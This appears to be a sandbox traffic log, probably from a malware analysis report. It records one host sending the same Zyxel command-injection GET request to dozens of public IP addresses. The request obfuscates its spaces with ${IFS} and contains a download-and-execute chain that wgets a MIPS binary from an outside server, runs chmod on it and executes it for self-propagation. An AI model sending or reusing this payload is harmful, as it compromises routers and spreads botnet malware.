                                                Jan 12, 2024 18:24:29.685152054 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2840192.168.2.1346978196.106.107.239443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:29.685174942 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2841192.168.2.134674892.100.127.83443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:29.685230017 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2842192.168.2.1351766106.143.80.196443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:29.685256004 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2843192.168.2.134022883.82.174.175443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:29.685281038 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2844192.168.2.1334684135.48.201.198443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:29.685333014 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2845192.168.2.134741694.186.36.55443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:29.685385942 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2846192.168.2.136033647.41.68.206443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:29.685434103 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2847192.168.2.136043492.239.192.226443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:29.685477018 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2848192.168.2.1357502129.176.86.105443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:29.685512066 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2849192.168.2.1353360167.13.133.120443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:29.685563087 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2850192.168.2.134274282.164.57.183443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:29.685623884 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2851192.168.2.1355432173.37.145.220443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:29.685657024 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2852192.168.2.134372481.197.54.43443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:29.685715914 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2853192.168.2.1345280143.162.52.143443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:29.685745001 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2854192.168.2.1350452106.80.96.137443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:29.685784101 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2855192.168.2.1334798169.191.30.122443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:29.685811996 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2856192.168.2.1345946162.84.212.101443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:29.685863972 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2857192.168.2.1341508122.171.207.225443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:29.685909986 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2858192.168.2.135292451.232.2.111443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:29.685928106 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2859192.168.2.134502649.135.141.74443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:29.685977936 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2860192.168.2.1345128200.213.146.22443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:29.686008930 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2861192.168.2.13339122.141.238.210443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:29.686038971 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2862192.168.2.1347292116.14.132.116443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:29.686074018 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2863192.168.2.1345750208.217.11.253443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:29.686114073 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2864192.168.2.1353906104.35.153.244443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:29.686150074 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2865192.168.2.133846078.247.37.24443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:29.686201096 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2866192.168.2.13333585.89.12.184443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:29.686225891 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2867192.168.2.134147848.246.60.4443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:29.686281919 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2868192.168.2.135872649.221.61.50443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:29.686302900 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2869192.168.2.13413465.58.238.80443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:29.686351061 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2870192.168.2.1358522168.166.169.47443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:29.686389923 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2871192.168.2.1338088122.138.83.4443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:29.686444998 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2872192.168.2.1357672207.251.79.32443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:29.686465025 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2873192.168.2.1336246100.162.30.61443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:29.686511040 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2874192.168.2.1348022177.22.205.248443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:29.686563969 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2875192.168.2.1350460217.96.61.190443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:29.686604023 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2876192.168.2.1360440141.185.183.46443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:29.686659098 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2877192.168.2.1350604114.78.251.18443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:29.686714888 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2878192.168.2.13333481.158.81.51443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:29.686763048 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2879192.168.2.1345980163.190.22.156443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:29.686809063 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2880192.168.2.1354244207.251.52.77443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:29.686845064 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2881192.168.2.1346060186.226.91.111443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:29.686908007 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2882192.168.2.1354462121.179.247.249443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:29.686954975 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2883192.168.2.133987487.116.112.128443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:29.687000036 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2884192.168.2.1341628142.115.255.115443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:29.687019110 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2885192.168.2.1332832122.37.96.251443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:29.687066078 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2886192.168.2.1335952103.213.100.1443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:29.687103033 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2887192.168.2.134294057.188.30.143443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:29.687143087 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2888192.168.2.1350428107.106.113.255443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:29.687172890 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2889192.168.2.1342938106.166.4.108443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:29.687237024 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2890192.168.2.1345648209.251.8.58443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:29.687272072 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2891192.168.2.1355166168.213.131.10443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:29.687304020 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2892192.168.2.1345364222.131.139.206443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:29.687350035 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2893192.168.2.1340136151.231.90.238443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:29.687392950 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2894192.168.2.1356150157.214.16.81443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:29.687407017 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2895192.168.2.1356554220.132.148.61443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:29.687448025 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2896192.168.2.1353400208.252.200.144443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:29.687511921 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2897192.168.2.135865258.66.108.253443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:29.687525034 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2898192.168.2.1353662167.125.70.108443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:29.687552929 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2899192.168.2.1358992195.115.210.52443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:29.687613964 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2900192.168.2.134208017.187.101.228443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:29.687644958 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2901192.168.2.1360188155.254.150.101443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:29.687681913 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2902192.168.2.1358388176.88.2.84443
                                                TimestampBytes transferredDirectionData
